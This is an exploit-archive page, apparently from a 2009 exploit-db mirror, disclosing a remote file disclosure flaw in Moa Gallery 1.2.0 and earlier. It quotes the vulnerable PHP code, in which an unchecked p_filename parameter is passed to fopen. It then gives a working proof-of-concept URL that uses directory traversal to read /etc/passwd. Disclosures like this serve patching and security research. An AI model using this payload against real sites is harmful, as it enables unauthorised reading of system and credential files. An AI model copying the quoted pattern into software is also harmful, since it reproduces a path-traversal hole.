[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure Vulnerability
# Published : 2009-08-26
# Author : GoLd_M
# Previous Title : TotalCalendar 2.4 (bSQL/LFI) Multiple Remote Vulnerabilities
# Next Title : Simple CMS FrameWork <= 1.0 (page) Remote SQL Injection Vuln


Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability
Code In sources_template_parser.php


    $filename = $MOA_PATH."templates/".$template_name."/".$p_filename;

    $fp = @fopen($filename, "r");
    if ((!$fp) && (is_bool($fp)))
    {
      $fp = $fp = @fopen($MOA_PATH."templates/MoaDefault/".$p_filename, "r");

POC
/sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd

# www.Syue.com [2009-08-26]